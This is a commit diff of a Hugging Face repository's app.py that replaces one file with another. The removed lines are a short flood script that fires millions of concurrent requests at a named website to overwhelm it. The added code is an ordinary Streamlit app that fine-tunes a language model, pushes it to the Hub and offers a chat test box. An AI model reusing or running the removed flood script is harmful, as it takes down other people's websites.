Neon-AI committed on
Commit
cab4035
·
verified ·
1 Parent(s): 94e55fb

Update app.py

Browse files
Files changed (1) hide show
  1. app.py +122 -13
app.py CHANGED
@@ -1,18 +1,127 @@
1
- import requests
2
- from concurrent.futures import ThreadPoolExecutor
 
 
 
 
 
3
 
4
- url = "https://k-anime.zone.id" # change this
5
- headers = {"User-Agent": "Dead/1.0"}
 
 
6
 
7
- def make_request():
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
8
  try:
9
- r = requests.get(url, headers=headers, timeout=5)
10
- return r.status_code
11
- except:
12
- return "Error"
 
 
 
 
13
 
14
- with ThreadPoolExecutor(max_workers=5000000) as executor:
15
- results = list(executor.map(lambda _: make_request(), range(5000000)))
 
 
16
 
17
- print("Results:", results)
18
- print("429s / blocks:", results.count(429))
 
 
 
 
 
 
 
 
1
+ import streamlit as st
2
+ import json
3
+ import torch
4
+ from transformers import AutoTokenizer, AutoModelForCausalLM, Trainer, TrainingArguments
5
+ from datasets import Dataset
6
+ from peft import LoraConfig, get_peft_model
7
+ from huggingface_hub import HfApi, HfFolder, Repository
8
 
9
# -------- CONFIG ----------
# Hub repository id: the model is loaded from it and pushed back to it.
MODEL_ID = "Neon-AI/Niche"
# Local working directory used as the Trainer output dir and the push checkout.
CHECKPOINT_DIR = "./checkpoints"
# Hugging Face access token, read from the Streamlit secrets store.
HF_TOKEN = st.secrets["HF_TOKEN"]

# Page heading.
st.title("🧠 Niche Trainer with Push to HF")
15
+
16
# ---------- Load model once ----------
@st.cache_resource
def load_model():
    """Load the tokenizer and causal language model identified by MODEL_ID.

    Wrapped in ``st.cache_resource`` so the objects are created once and then
    reused instead of being reloaded on each script run.

    Returns:
        A ``(tokenizer, model)`` tuple.
    """
    # Half precision only when a CUDA device is available, float32 otherwise.
    dtype = torch.float16 if torch.cuda.is_available() else torch.float32

    tok = AutoTokenizer.from_pretrained(MODEL_ID)
    lm = AutoModelForCausalLM.from_pretrained(MODEL_ID, torch_dtype=dtype)

    # Padding needs a pad token; fall back to EOS when the tokenizer has none,
    # then resize the embedding matrix to the tokenizer's length.
    if tok.pad_token is None:
        tok.pad_token = tok.eos_token
        lm.resize_token_embeddings(len(tok))

    return tok, lm
28
+
29
# Tokenizer/model pair shared by the training and chat sections below.
tokenizer, model = load_model()

# ---------- LoRA / Full model selection ----------
_FINETUNE_CHOICES = ["Full model", "LoRA"]
finetune_type = st.radio("Select fine-tune type:", _FINETUNE_CHOICES)

# ---------- JSON input ----------
# The pasted text is expected to be a JSON list of objects that each carry a
# "prompt" and a "response" key.
_JSON_LABEL = "JSON format: [{'prompt': 'Hello', 'response': 'Hi there!'}, ...]"
_JSON_PLACEHOLDER = '[{"prompt": "...", "response": "..."}]'

st.subheader("Paste your JSON training examples")
json_input = st.text_area(
    _JSON_LABEL,
    height=300,
    placeholder=_JSON_PLACEHOLDER,
)
41
+
42
# ---------- Train ----------
# Streamlit re-executes this script from the top on every widget interaction.
# A plain variable would therefore be reset to False by the rerun that the
# "Push to Hugging Face" click triggers, and the push branch could never run.
# The flag and the trained model are kept in st.session_state, which persists
# across reruns of the same browser session.
train_started = st.session_state.get("train_started", False)
if st.button("Train"):
    try:
        examples = json.loads(json_input)
        if not examples:
            st.warning("No examples provided!")
        else:
            # One training string per example, in a fixed chat-style template.
            texts = [
                f"### User:\n{e['prompt']}\n\n### Assistant:\n{e['response']}"
                for e in examples
            ]
            ds = Dataset.from_dict({"text": texts})

            def tokenize(batch):
                """Tokenize a batch of texts and attach causal-LM labels.

                Every sequence is padded/truncated to 256 tokens. Labels copy
                the input ids, except that padded positions (attention mask
                0) are set to -100 so the loss ignores them instead of
                training the model to emit padding.
                """
                out = tokenizer(
                    batch["text"],
                    truncation=True,
                    padding="max_length",
                    max_length=256,
                    return_attention_mask=True,
                )
                out["labels"] = [
                    [tok_id if keep else -100 for tok_id, keep in zip(ids, mask)]
                    for ids, mask in zip(out["input_ids"], out["attention_mask"])
                ]
                return out

            ds = ds.map(tokenize, batched=True)
            ds.set_format("torch")

            # ---------- Apply LoRA if selected ----------
            if finetune_type == "LoRA":
                peft_config = LoraConfig(
                    task_type="CAUSAL_LM",
                    r=16,
                    lora_alpha=32,
                    lora_dropout=0.1,
                    # NOTE(review): "c_attn" is a GPT-2 style module name;
                    # confirm it exists in the MODEL_ID architecture.
                    target_modules=["c_attn"],
                )
                train_model = get_peft_model(model, peft_config)
            else:
                train_model = model

            args = TrainingArguments(
                output_dir=CHECKPOINT_DIR,
                per_device_train_batch_size=1,
                gradient_accumulation_steps=2,
                num_train_epochs=1,
                learning_rate=2e-5,
                logging_steps=1,
                save_strategy="no",
                report_to="none",
            )

            trainer = Trainer(
                model=train_model,
                args=args,
                train_dataset=ds,
            )

            st.info("Training started...")
            trainer.train()
            st.success("✅ Training done!")

            # Persist the result so the push section can still see it after
            # the rerun caused by clicking the push button.
            st.session_state["train_model"] = train_model
            st.session_state["train_started"] = True
            train_started = True
    except Exception as e:
        # UI boundary: show any failure (bad JSON, missing keys, training
        # errors) to the user instead of crashing the app.
        st.error(f"Error: {e}")

# ---------- Push to HF ----------
if train_started and st.button("Push to Hugging Face"):
    try:
        # Restore the model trained in an earlier run of this session.
        train_model = st.session_state["train_model"]

        # NOTE(review): Repository is a legacy git-based helper in
        # huggingface_hub; confirm the installed version still provides it.
        repo = Repository(
            local_dir=CHECKPOINT_DIR,
            clone_from=MODEL_ID,
            use_auth_token=HF_TOKEN,
        )
        # Save trained model + tokenizer
        train_model.save_pretrained(CHECKPOINT_DIR)
        tokenizer.save_pretrained(CHECKPOINT_DIR)

        repo.push_to_hub(commit_message="Update Niche model with new training")
        st.success("✅ Model pushed to HF successfully!")
    except Exception as e:
        st.error(f"Push failed: {e}")
118
 
119
# ---------- Chat ----------
st.subheader("Test the model")
user_prompt = st.text_input("You:", "")
if st.button("Send"):
    if user_prompt.strip():
        # The shared model may have just been through trainer.train(), which
        # leaves it in training mode; switch to eval mode so dropout is
        # disabled while generating. Calling eval() repeatedly is harmless.
        model.eval()

        # Tokenize the raw prompt and move the tensors to the model's device.
        inputs = tokenizer(user_prompt, return_tensors="pt").to(model.device)
        outputs = model.generate(
            **inputs,
            max_new_tokens=100,
            do_sample=True,
            temperature=0.7,
        )
        # outputs[0] holds the prompt tokens followed by the generated ones.
        response = tokenizer.decode(outputs[0], skip_special_tokens=True)
        st.text_area("Niche:", value=response, height=200)